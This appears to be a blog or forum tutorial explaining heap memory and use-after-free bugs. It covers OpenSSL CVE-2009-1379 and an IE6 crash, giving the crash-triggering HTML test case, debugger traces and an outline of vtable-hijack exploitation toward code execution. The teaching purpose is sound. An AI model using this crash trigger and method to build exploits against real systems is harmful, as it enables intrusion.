Yea right!
Last week a friend asked few queries regarding use after free vulnerabilities, . It's been a while I wrote a tutorial so taught of cooking a beginners guide this week end. I wanted a live target for the tutorial so my plans were to run my fuzzer on an old version of IE 6, since it is easy to find a bug in and it's not worth to blog out any new versions 0-day . Any way I picked up the first test case IE crashed on and did some analysis to add it up to this tutorial.I din't spent much time with the crash since it's pointless to digg deep
So this blog post I will explain in detail the following.
1)The OS Heap and memory allocations.
2)Use after free issues and example buggy codes.
3) Analysis of a IE 6 crash, Use after free issue.
4) Exploiting Use after free bugs.
*Stay tuned for som Win8 IE10 stuffs ;
The Basics of OS Memory Management :
Memory used by program is divided into four,
- The code area aka text segment [compiled program in memory ].
- The globals [global variables are stored] .
Initialized Data Segment
Uninitialized Data Segment.
Uninitialized Data Segment.
- The heap, dynamically allocated variables.
- The stack, parameters and local variables .
Code Area:
This is the region in a virtual adress space that holds the executing instructions.It is is assigned memory below the stack and heap, to prevent an overflow overwriting the code.
The Globals:
Initialized Data segment [DS].
This region holds the global and static variables that are initialized by the programmer.
For example:
Code:
int a = 0; char * fb ="fb1h2s";
Uninitialized Data segment [BSS].
For example:
Code:
int a int b ;
Stack:
Stack is a [Last in First out] data structure , so it's basically used for local storages and function calls etc.It has got it's own registers and instructions sets. So it even hold the raw byte of instruction executed by the program. This is one of the reason why stack based vulnerabilities are easy to exploit.
Stack allocations are done when variables are stored directly to memory .
For example:
PHP Code:
void f()
{
if(true) {
int b = 0;
}
b = 1;
}
*b is not available outside the if { } block, so the above program would have compilation issues.
Heap :
So considering the above if we need to handle memmory dynamically ,thats where Heap comes into picture. Heap overtakes the disability of stack, it's is the segment where dynamic memory allocation usually takes place.
Unlike stack memmory allocations[LIFO] the term "heap memory allocations" is unrelated to heap data structure. It's basically a linked list of used and free blocks. When a request for memory is made by functions like (new,malloc,GlobalAlloc,LocalAlloc, malloc,HeapAlloc,RtlAllocateHeap etc) they are satisfied by providing a suitable block from one of the free blocks. This requires updating list of blocks on the heap [Heap Management ]. This meta information about the blocks on the heap is also stored on the heap often in a small area just in front of every block .The various OS implementation of heap management functions make use of these meta info when allocating and freeing heap. And the many heap based exploits out there make use of these heap management structures to achieve code execution by feeding them with malformed data.
Note: Heap overflow and [Dangling pointer, Use after free bugs] are two diff things.
Bulletins:
• The heap size is predefined at application startup but can grow as per required.
• You would use the heap if you don’t know exactly how much data you will need at runtime or if you need to allocate a lot of data.
• Responsible for memory leak, you need to free the unused memory manually.
• You need to manually free memory onces it is no more in use and that should never fall out of scope. The data is freed with GlobalFree , LocalFree, delete[] free etc functions .
• Can have allocation failures if too big of a buffer is requested to be allocated.
• All shared libraries and dynamically loaded modules in a process could access the heap. This same reason why you can do heap spraying on a browser using any loaded modules example: flash,java script ,vbs etc.
memory management - What and where are the stack and heap? - Stack Overflow
Example Program Demonstrating memory allocations.
PHP Code:
int *x; /* Uninitialized variable stored in bss*/
int w; /* Uninitialized variable stored in bss*/
int y =10 ; /* Initialized variable stored in DSS*/
void b()
{
if(1==1)
{
x = malloc(sizeof(int)); /* Memmory allocated in Heap */
/*memory not freed */
}
}
void c()
{
free(x); /* Memory Freed */
}
int main(void)
{
static int f =10 ; /* Initialized static variable stored in DS */
static int i; /* Uninitialized static variable stored in bss */
b();
c();
return 0;
}
In short large variables of arrays whose size may vary, heap memory allocation is used. So heap related security issues occur when
1) Not freeing all of the memory allocated ending up with memory leaks.
2)Using of already released memory would lead to Use after free security issues.
3) Double freeing memory would cause memory corruptions .
Use after free issues and example buggy codes.
[I]#dangling pointers #use after free #double free
Example Buggy program:
Code:
int main(void) { char *ch_ptr = malloc(100); int i; for (i = 0; i < 99; i++) { ch_ptr = 'A'; free(ch_ptr); printf("%s\n", ch_ptr); } }
Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows.
So the exploitation goes based on the nature of the crash, we will dig into the exploitation methods later.
A Live example:
For demonstration a good and easy to understand bug would be the CVE-2009-1379 OpenSSL from 0.9.8 to 0.9.8k use after free bug.
The buggy code:
https://bugzilla.redhat.com/attachme...71&action=diff
The Bug:
al is initilized at line 424 to &frag->msg_header and at line 533 it's freed using dtls1_hm_fragment_free(frag); and at line 536 if the following condition satisfies "(if al=0)" then program will try to access "frag" line 539 which was freed at line 533. So this will cause an invalid read operation , possibly crashing the app, and if we are some how able to control the adress that its reading form [heap spray!! or what ever], then we would be able to achieve code execution.
The Fix:
The simple fix to this was to add a temporary variable at line 533 "frag_len = frag->msg_header.frag_len;" holding frag->msg_header.frag_len. And later return frag_len instead of the freed object.
Fuzzing for Use After Free and Fuzzers
*We will have another blog post for this some time later.
Exploiting Use after free bugs.
C++ Virtual Functions :
C++ matches a correct function call based on the type of the object at runtime. This is called dynamic binding and this is done by using the keyword "virtual". The virtual keyword instructs the compiler that it should choose the right function based on the object it's reference referred to rather than the type. These objects that are referred by virtual functions points to a virtual table VFTABLE[Virtual Function Table] . It's where all the virtual functions adress are stored. It would be the first DWORD in the object memory.
Image Source:http://www.blackhat.com/presentation...07-afek-WP.pdf
Example Program:
PHP Code:
#include<iostream>
using namespace std;
class Test
{
public :
virtual void Show()
{
cout<<"I am in Test Class"<<endl;
}
};
class Test1 : public Test
{
public:
virtual void Show()
{
cout<<"I am in Test1 Class"<<endl;
}
};
int main()
{
Test *Obj;
Test Obj1; // Base Class Object
Test1 Obj2; //Derived Class Object
Obj = &Obj2;
Obj->Show(); //In this case derived class show function called.
Obj = &Obj1;
Obj->Show(); //In this case Base class show function called.
}
[B]And the output is :[/B]
[CODE]I am in Test1 Class
I am in Test Class[/CODE]
IBM Linux Compilers
The above program will have the following vftable structure.
Code:
Class Test size(8): +--- |{vfptr} +--- Test's Vftable: +-- | {vfptr} | &test::Show Class Test1 size(8): +--- |{vfptr} +--- Test1's Vftable: +-- | {vfptr} | &test1::Show
Code:
004013D0 |. 8D45 C8 LEA EAX,DWORD PTR SS:[EBP-38] 004013D3 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013D6 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013DB |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013DE |. 890424 MOV DWORD PTR SS:[ESP],EAX 004013E1 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 004013E3 |. FFD0 CALL EAX Here EAX point to the Virtual Function table which point to calls the "Test1" 004013E5 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 004013EC |. E8 AFF20000 CALL <JMP.&msvcrt.system> ; \system 004013F1 |. 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28] 004013F4 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013F7 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FA |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013FC |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FF |. 890424 MOV DWORD PTR SS:[ESP],EAX 00401402 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 00401404 |. FFD0 CALL EAX Here EAX point to the Virtual Function table and calls the "Test" class 00401406 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 0040140D |. E8 8EF20000 CALL <JMP.&msvcrt.system> ; \system 00401412 |. B8 00000000 MOV EAX,0 00401417 |. C9 LEAVE 00401418 \. C3 RETN
Code:
0:000> t eax=00410a5c ebx=00004000 ecx=0040cc50 edx=00441c84 esi=00def786 edi=00def6f2 eip=004013e3 esp=0022ff10 ebp=0022ff78 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 image00400000+0x13e3: 004013e3 ffd0 call eax {image00400000+0x10a5c (00410a5c)} 0:000> u 00410a5c image00400000+0x10a5c: 00410a5c 55 push ebp 00410a5d 89e5 mov ebp,esp 00410a5f 83ec08 sub esp,8 00410a62 c744240419004400 mov dword ptr [esp+4],offset image00400000+0x40019 (00440019) 00410a6a c70424c0334400 mov dword ptr [esp],offset image00400000+0x433c0 (004433c0) 00410a71 e8a6b60200 call image00400000+0x3c11c (0043c11c) 00410a76 c7442404ecae4300 mov dword ptr [esp+4],offset image00400000+0x3aeec (0043aeec) 00410a7e 890424 mov dword ptr [esp],eax
- De allocate an object having a VFT entry
- Controlling the Vftable and pointing it to out own [shellcode]code.
- So now when a Virtual Function call takes place it point to our injected code.
Use After Free Exploitation [IE 6 0-day].
HTML Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTAL 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="refresh" content="1"> <title>FB1H2S Browser Test , soemthing weired here</title> <link href="sass.css" rel="stylesheet" type="text/css"/> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script> <script> document.write("FB1H2S Use After Free test#213"); </script> </head> <body> <div style="float:left; width:770px; margin-left:8px;"> <div class="fb1h2s_fb1h2s"> </div> <span > </span> <div class="fb1h2s_fb1h2s_fb1h2s"> <div class="fb1h2s_fb1h2s_fb1h4s" > IE WTF </div> <div class="aboutproduct">FB1H2s : FB!H2S : THE Garage 4 Hackers : Bla Bla Bla</div> </div> <div class="fb1h2s_fb1h2s_fb1h3s"> </div> </div> </body> </html> sass.css .fb1h2s_fb1h2s, .fb1h2s_fb1h2s_fb1h2s{background-color:#fff;width:564px;float:left;height:auto;marg in:5px 0 5px 9px} .fb1h2s_fb1h2s_fb1h3s{float:left;width:164px;margi n-left:5px} .fb1h2s_fb1h2s_fb1h4s{width:551px;height:34px;back ground-repeat:no-repeat;font-size:13px;font-weight:700;font-family:arial;margin-left:10px;float:left;padding:7px 0 0 10px} .aboutproduct{width:530px;height:auto;text-align:justify;line-height:18px;float:left;font-family:arial;color:#333;margin-bottom:10px;padding:0 5px 5px 13px}
Code:
(914.8fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04cb4740 ebx=00000000 ecx=04cb4740 edx=04b80bfc esi=04cd8b40 edi=00080000 eip=7d51f463 esp=0013e5a4 ebp=0013e5f0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=????????
The Backtrace.
Code:
0:000> knL # ChildEBP RetAddr 00 0013b478 7d54f5c0 mshtml!CDispNode::GetDispRoot+0x12 01 0013b4bc 7d55118b mshtml!CDispNode::ReplaceNode+0xdb 02 0013b50c 7d50b3ad mshtml!CLayout::EnsureDispNodeCore+0x348 03 0013b5bc 7d688af4 mshtml!CLayout::EnsureDispNode+0x5a 04 0013b7f0 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0x3ff 05 0013b808 7d50a136 mshtml!CFlowLayout::CalcSizeCore+0x2f 06 0013b840 7d5069d1 mshtml!CFlowLayout::CalcSizeVirtual+0x17e 07 0013b954 7d539257 mshtml!CLayout::CalcSize+0x224 08 0013b9c8 7d539def mshtml!CFlowLayout::MeasureSite+0x1e5 09 0013ba0c 7d539d26 mshtml!CFlowLayout::GetSiteWidth+0x12b 0a 0013ba38 7d6ca5e3 mshtml!CLSMeasurer::GetSiteWidth+0x80 0b 0013bb44 7d5befb2 mshtml!CRecalcLinePtr::AlignObjects+0x30b 0c 0013bbc4 7d5136e0 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOLCore+0x1d7 0d 0013bc14 7d514345 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOL+0xa9 0e 0013bcc8 7d5131cd mshtml!CRecalcLinePtr::MeasureLine+0x384 0f 0013c084 7d5114a5 mshtml!CDisplay::RecalcLinesWithMeasurer+0x502 10 0013c204 7d506252 mshtml!CDisplay::RecalcLines+0x67 11 0013c21c 7d506529 mshtml!CDisplay::RecalcView+0x6b 12 0013c2c4 7d689582 mshtml!CFlowLayout::CalcTextSize+0x2ee 13 0013c4fc 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0xe8d
Code:
mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret
Code:
mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f458 8bc6 mov eax,esi 7d51f45a 5e pop esi 7d51f45b c3 ret 7d51f45c 90 nop 7d51f45d 90 nop 7d51f45e 90 nop 7d51f45f 90 nop 7d51f460 90 nop mshtml!CDispNode::GetRootNode: 7d51f461 8bc1 mov eax,ecx 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=???????? 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret
PHP Code:
int __thiscall CElement__GetParentAncestorSafe(int this, int a2)
{
int result; // eax@1
int v3; // ecx@1
int v4; // ecx@2
v3 = *(_DWORD *)(this + 16);
result = 0;
if ( v3 )
{
v4 = *(_DWORD *)(v3 + 4);
if ( v4 )
{
do
{
if ( *(_BYTE *)(v4 + 8) == a2 )
break;
v4 = *(_DWORD *)(v4 + 4);
}
while ( v4 );
if ( v4 )
result = *(_DWORD *)v4;
}
}
return result;
}
/(7D51F437)
void *__thiscall CDispNode__GetDispRoot(void *this)
{
void *v1; // eax@1
void *v2; // esi@1
void *result; // eax@3
v1 = CDispNode__GetRootNode(this);
v2 = v1;
if ( v1 && (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v1 + 52))(v1) )
result = v2;
else
result = 0;
return result;
}
The program crashes due to a use after free issue.
Code:
>u 7d51f463 7d51f463 8b4808 mov ecx,dword ptr [eax+8]
Code:
0:000> d 04cb4748 04cb4748 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4758 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4768 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4778 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
If you look at the next instructions , we notice the following .
Code:
7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret
Code:
ecx = dword ptr[ eax+8 ] if (ecx ==0): -7d51f46e: return(eax) to 7d51f43f [calling module] | | else: | loop() | |-> and at:7d51f43f { mov esi,eax <-- value of eax returned form the above function test esi,esi <-- if (esi) ==0 take jmp je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) mov eax,dword ptr [esi] ds:0023:04ca1d40= <-- move to eax data pointed by esi mov ecx,esi <-- not usefull call dword ptr [eax+34h] <-- call adress pointed by eax+34h }
What I did was arranged my HTML tags such a way that it would leave a lot of garbage values mainly null in the EAX pointed memory, and then the program would crash at the call instruction. This is never the right way of doing nor reliable, but it was working fine for me.
No we could take control of the program here.
Code:
7d51f44d ff5034 call dword ptr [eax+34h]
Code:
(36c.440): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=01c53380 ecx=01c3e6e0 edx=000000a4 esi=01c3e6e0 edi=01c071f4 eip=7d51f44d esp=0013b478 ebp=0013b4bc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetDispRoot+0x12: 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data.
Code:
mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
Move DWORD (a 32-bit/4-byte value) in memory location specified by ESI[01c3e6e0]-->"00000000" into register EAX, so EAX becomes [00000000]
7d51f44d ff5034 call dword ptr [eax+34h]
The crash is at a virtual Call with [Register + offset ] . The Vftable is in eax + offset[34h] the adress of function to be executed . In this case it would be 13th entry in the table. Now that it's pointing to [00000000] the program crashes.
We can take control of the program here and have code execution, for that we need to find the type of object that was freed and the no of bytes that was allocated . Knowing these details we would be able to build fake objects of that size using JS . So that a the call at 7d51f463 [eax+8] would land on our crafted Vftable object and return [00000000] and
Code:
7d51f463 8b4808 mov ecx,dword ptr [eax+8]
Code:
7d51f44d ff5034 call dword ptr [eax+34h]
There are couple of ways to exploit this a good reference would be this.
1) The double reference exploit
Requirements:
A controllable VFTable pointer.
Method:
Our own code is placed in the deallocated object or some where in the memory where we could point to via Vftable.
Then we replace the VFTable pointer by one which points to some memory
later we will use this as VFTable pointing back to where we put our code.
source:
2) The VFTable exploit
Requirements:
A controllable VFTable .
Method:
Our code is injected in the VFTable which is made to point to itself.
Depends:
This this achieved by the system allocation process.
The Lookaside exploit
Requirements:
A controllable heap allocation / heap deallocation cycle.
Method:
Since the system reallocates a freed memory , we craft the code in such a way that when reallocation takes place our injected code is used in the reallocation cycle.
Read More: http://www.blackhat.com/presentation...irov-apr19.pdf
Read in detail here a similar approach http://securityevaluators.com/files/.../isewoot08.pdf
For choosing an appropriate method for exploitation we need determine what all we control in the current scenario and understand more about the crash. We can either use the debugger for this purpose or reverse engineer the current code to figure out those details.
*Thanks to w3devil and Zarul for proof reading the doc
Cheers.
References on Heap :
A practical C storage class scope and memory allocation programming online training - C language references, working program examples, source code and memory related function library
Data segment - Wikipedia, the free encyclopedia
Memory segmentation - Wikipedia, the free encyclopedia
.bss - Wikipedia, the free encyclopedia
Memory Layout of C Programs - GeeksforGeeks | GeeksforGeeks
gperftools - Fast, multi-threaded malloc() and nifty performance analysis tools - Google Project Hosting
A Heap of Risk - The H Security: News and Features
http://x9090.blogspot.in/2010/03/tut...rial-from.html
http://en.wikibooks.org/wiki/C_Progr...Use_after_free
http://www.quora.com/Why-is-dynamic-...ory-allocation
http://eli.thegreenplace.net/2011/09...out-on-x86-64/
Exploitation References :
http://d0cs4vage.blogspot.in/2011/06...ugs-patch.html
http://www.phreedom.org/research/hea...feng-shui.html
http://securityevaluators.com/files/.../isewoot08.pdf
http://www.exploit-monday.com/2011_11_13_archive.html
www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf
http://www.phreedom.org/research/hea...feng-shui.html
http://www.thegreycorner.com/2010/01...-internet.html
https://www.owasp.org/images/0/01/OW..._Heapspray.pdf
https://www.corelan.be/index.php/201...spray_8211_IE6
http://www.blackhat.com/presentation...07-afek-WP.pdf
http://www.blackhat.com/presentation...irov-apr19.pdf
http://www.exploit-monday.com/2011/0...r-free_07.html
http://www.vupen.com/blog/20120116.A...30_Part_II.php
Protection Mechanisms:
http://robert.ocallahan.org/2010/10/...-using_15.html